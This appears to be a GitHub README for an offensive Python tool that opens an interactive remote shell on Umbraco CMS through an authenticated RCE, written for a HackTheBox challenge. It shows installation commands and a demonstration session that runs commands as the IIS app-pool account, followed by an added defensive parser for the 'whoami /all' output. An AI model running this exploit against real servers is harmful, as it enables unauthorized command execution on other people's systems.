
Shell-Exploit-Umbraco

RCE - Shell Exploit Umbraco

Description

This module implements a shell to exploit a RCE in umbraco CMS.

I implemented this module for a HackTheBox challenge; it's useful when you can't write or download any file.

Requirements

This package requires:

  • python3
  • python3 Standard Library

Installation

git clone "https://github.com/mauricelambert/shell_exploit_umbraco.git"
cd "shell_exploit_umbraco"
python3 -m pip install .

Demonstration

┌──(kali㉿kali)-[~/Documents/HTB]
└─$ python3 exploit_shell_umbraco.py
Host (example: http://10.10.100.101): http://10.129.230.172
Username: [email protected]
Password: 
[*] Send login request
[+] New cookies: UMB-XSRF-TOKEN=kPiEjnUoifsXRwPU9Yc9mKvLLjlDe3b9myPZdQvzL2PZJtO_GHTg32RKgaS2CaQuXYE7YXY9UYNH-72pRboM5YzwFlp-yX5A2eWauXu77EtwR3qurlpy4KkUYR_jh_z00; path=/, UMB-XSRF-V=RXVR-FwE-AT3LIOAG_35oInJXGDoUQjMMxFs2rSST9xiTuW7ENR4xe_63l_vu1BfzrqldbEAW8npVePwGd5AWui1RiKYlEV6l5VsbfJXuis1; path=/; httponly, UMB_EXTLOGIN=; path=/; expires=Thu, 01-Jan[...]path=/; expires=Sun, 25-Feb-2024 14:31:13 GMT; HttpOnly
[*] Send GET request for CSRF token
[+] Found 'input' with id '__VIEWSTATE' and value 'aPc9IRB05sutyu3mh8Oe4fzUYEt5jf3WYggoPLD80MfL4TCfQYH+wZ89pXNeamT2jBBZdHeQl9rL0+4as5TtPH5o+VCNz6NsXoWTzKOgtvl8F4KU3g4pz5rg/Gfkn9mO'
[+] Found 'input' with id '__VIEWSTATEGENERATOR' and value '7F6ABE9B'
[*] Build payload for command: echo %cd%
[+] Found 'input' with id '__VIEWSTATE' and value 'ml2NHYvTsuYI/68j9P+cjtKklEPiqMTyfNrbrbU0nSlQIxhxgZeoaE5megfiaxm2BrDqEWOpD7spHd48wmploPqFvdg1RSvKdsGMqrAV0LpdGQx6QzVlUteOz/Umoel+sVpvPMaYo9eDW6MZcSCXcqx4fgPdnJ+zSwdBXNVBqJxqAIv4GrsS9+8p/xx6VIzISzTLc4m7Nga/KVykqUDM2ezu0AEJwptgOHZrcjG5JaAw7YACU50nmPmDwBkpI5s2BJiSkZQilvFXG3VUmqHbE4owKF0dje/mgRMdDgPXwD8NJEZjADVsw2Tpuph/FV/BoPHUcq+nJdXlwl1BzzOtFA=='
[+] Found 'input' with id '__VIEWSTATEGENERATOR' and value '7F6ABE9B'
[+] Found data: c:\windows\system32\inetsrv

Welcome to the Umbraco exploit shell - do not use it for illegal purposes
[email protected]:c:\windows\system32\inetsrv> whoami /all
[*] Build payload for command: whoami.exe /all
[+] Found 'input' with id '__VIEWSTATE' and value '...'
[+] Found 'input' with id '__VIEWSTATEGENERATOR' and value '7F6ABE9B'
[+] Found data: 
USER INFORMATION
----------------

User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


[email protected]:c:\windows\system32\inetsrv> Bye !

┌──(kali㉿kali)-[~/Documents/HTB]
└─$ 
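
The `whoami /all` output in the session above is the kind of artefact a defender wants to triage: which identity the web application runs as and which of its privileges are enabled. The following Python example, added here and not part of the Shell-Exploit-Umbraco repository, parses that output (a trimmed copy is embedded as a constructed sample) and reports the enabled privileges from a hardening watch list; the watch list itself is the example's assumption, not something the page states.

```python
# Added example, not part of the Shell-Exploit-Umbraco repository: parse the
# `whoami /all` output captured above and report which enabled privileges a
# hardening review of an IIS application-pool identity would look at.
# Assumption: this watch list is the example's own, not something the page states.
WATCH_LIST = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
              "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
              "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege"}

# Constructed sample: a trimmed copy of the whoami /all output shown above.
SAMPLE = """USER INFORMATION
----------------

User Name                  SID
========================== =============================================================
iis apppool\\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""


def parse_whoami(text):
    """Return (user_name, {privilege_name: state}) from whoami /all output."""
    user, privs, section = None, {}, None
    for line in text.splitlines():
        if line.endswith("INFORMATION"):       # USER / GROUP / PRIVILEGES header
            section = line.split()[0]
            continue
        if not line.strip() or line[0] in "-=" or line.startswith(
                ("User Name", "Group Name", "Privilege Name")):
            continue                           # separators and column headers
        if section == "USER" and user is None:
            user = line.rsplit(None, 1)[0]     # everything before the trailing SID
        elif section == "PRIVILEGES":
            fields = line.split()
            privs[fields[0]] = fields[-1]      # first column: name, last: state
    return user, privs


def review(text):
    """Return the account and the sorted enabled privileges from WATCH_LIST."""
    user, privs = parse_whoami(text)
    flagged = sorted(p for p, s in privs.items() if s == "Enabled" and p in WATCH_LIST)
    return user, flagged
```

Running `review(SAMPLE)` on the sample reports the application-pool account and `SeImpersonatePrivilege` as the only enabled watch-list privilege, which is the item to raise with whoever owns the server's app-pool configuration.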

License

Licensed under the GPL, version 3.